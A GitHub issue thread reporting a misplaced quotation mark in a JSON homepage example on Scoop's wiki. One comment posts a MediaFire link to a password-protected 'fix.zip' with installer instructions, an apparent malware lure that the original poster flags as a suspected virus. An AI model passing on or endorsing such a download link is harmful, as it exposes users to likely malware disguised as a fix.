### ISSUE TITLE
[Wiki] typo 

### ISSUE THREAD

**Issue by neko-tail** [ScoopInstaller/Scoop#6123]
In the first code block of https://github.com/ScoopInstaller/Scoop/wiki/App-Manifest-Autoupdate#using-regex-in-checkver

```json
"homepage": "<https://golang.org">,
```

perhaps it should be:

```json
"homepage": "<https://golang.org>",
```

or as in https://github.com/ScoopInstaller/Main/blob/master/bucket/go.json:

```json
"homepage": "https://golang.org",
```

**Comment by HeinousAgenda38** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by neko-tail** [comment]
> Download https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file password: changeme In the installer menu, select "gcc."下载 https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file 密码：changeme 在安装程序菜单中，选择“gcc”。

It's suspected to be a virus file

**Comment by HUMORCE** [comment]
Updated. Make `main/rust` as the example.
